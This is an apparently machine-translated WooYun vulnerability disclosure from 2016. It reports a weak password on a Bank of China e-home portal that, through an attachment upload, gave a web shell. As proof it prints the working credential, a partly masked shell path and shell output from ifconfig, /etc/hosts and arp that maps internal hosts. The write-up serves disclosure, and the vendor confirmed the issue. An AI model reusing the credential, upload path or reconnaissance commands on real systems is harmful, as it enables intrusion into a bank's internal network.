漏洞标题 中国银行系统中的弱密码可以上传SHELL(通过边界防火墙进入内部网络) 相关制造商 中国银行 漏洞作者 猪人 提交时间 2016-05-01 14: 44 公共时间 2016-06-18 21: 00 漏洞类型 未经授权的访问/许可绕过 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 安全意识不足,背景是猜测的 漏洞详细信息 #1发现方法 利用通用的弱密码检测脚本,它简单,高效,功能强大。 http://zone.wooyun.org/content/22529 http://zone.wooyun.org/content/21962 中文名称排名TOP500(来自全国人口数据库的数据统计) http://zone.wooyun.org/content/18372 #2漏洞描述 https://e.boc.cn/ehome/property/frame/sign.do 找到1个弱密码:wangwei:000000 社区管理功能,添加附件,即可获得shell
漏洞证明: https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp
[/] $/sbin/ifconfig -a Eth0链路封装:以太网HWaddr 00: 50: 56: 9A: 72: 2C Inet addr: 21.123.47.151 Bcast: 21.123.47.255掩码: 255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU: 1500公制: 1 RX包: 127879201错误: 0丢弃: 0溢出: 0帧: 0 TX包: 117334178错误: 0丢弃: 0溢出: 0载波: 0 碰撞: 0 txqueuelen: 1000 RX字节: 22666975632(21.1 GiB)TX字节: 32615347620(30.3 GiB) Eth1链路封装:以太网HWaddr 00: 50: 56: 9A: 14: * Inet addr: 10.123.47.151 Bcast: 10.123.47.255掩码: 255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU: 1500公制: 1 RX数据包: 51273711错误: 0丢弃: 0溢出: 0帧: 0 TX包: 46856648错误: 0丢弃: 0溢出: 0载波: 0 碰撞: 0 txqueuelen: 1000 RX字节: 12233542012(11.3 GiB)TX字节: 9912431273(9.2 GiB) Lo Link encap: Local Loopback Inet addr: 127.0.0.1掩码: 255.0.0.0 UP LOOPBACK RUNNING MTU: 65536公制: 1 RX数据包: 238664440错误: 0丢弃: 0溢出: 0帧: 0 TX包: 238664440错误: 0丢弃: 0溢出: 0载波: 0 碰撞: 0 txqueuelen: 0 RX字节: 24040429146(22.3 GiB)TX字节: 24040429146(22.3 GiB) [/] $ cat/etc/hosts 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 : 1 localhost localhost.localdomain localhost6 localhost6.localdomain6 21.123.47.146P1EZECAP01 21.123.47.147P1EZECAP02 21.123.47.148P1EZECAP03 21.123.47.149P1EZECAP04 21.123.47.150P1EZECAP05 21.123.47.151P1EZECAP06 21.123.47.152P1EZECAP07 21.123.47.153P1EZECAP08 10.123.47.146P1EZECAP01_gpfs 10.123.47.147P1EZECAP02_gpfs 10.123.47.148P1EZECAP03_gpfs 10.123.47.149P1EZECAP04_gpfs 10.123.47.150P1EZECAP05_gpfs 10.123.47.151P1EZECAP06_gpfs 10.123.47.152P1EZECAP07_gpfs 10.123.47.153P1EZECAP08_gpfs 21.122.32.116 ZabbixServer 21.123.102.88 nbu3media1 21.123.102.89 nbu3media2 21.123.102.90 nbu3master [/] $/sbin/arp -a ? (21.123.47.161)00: 50: 56: 9a: 3d: 95 [ether] on eth0 P1EZECAP05(21.123.47.150)00: 50: 56: 9a: 00: 55 [ether] on eth0 ? (21.123.47.1)at 00: 00: 0c: 9f: f0: 2f [ether] on eth0 P1EZECAP01_gpfs(10.123.47.146)位于00: 50: 56: 9a: 62: 66 [ether] on eth1 P1EZECAP05_gpfs(10.123.47.150)位于00: 50: 56: 9a: 79: c7 [ether] on eth1 P1EZECAP03_gpfs(10.123.47.148)位于00: 50: 56: 9a: 31: 0c [ether] on eth1 P1EZECAP04_gpfs(10.123.47.149)位于00: 50: 56: 9a: 6f: 8f [ether] on eth1 P1EZECAP07(21.123.47.152)00: 50: 56: 9a: 49: 62 [ether] on eth0 P1EZECAP08_gpfs(10.123.47.153)位于00: 50: 56: 9a: 7b: 08 [ether] on eth1 P1EZECAP07_gpfs(10.123.47.152)位于00: 50: 56: 9a: 05: f1 [ether] on eth1 P1EZECAP02_gpfs(10.123.47.147)位于00: 50: 56: 9a: 56: 89 [ether] on eth1 [/] $ 修理计划: 补偿密码,补充上传漏洞 版权声明:转载请注明出处猪猪人@乌云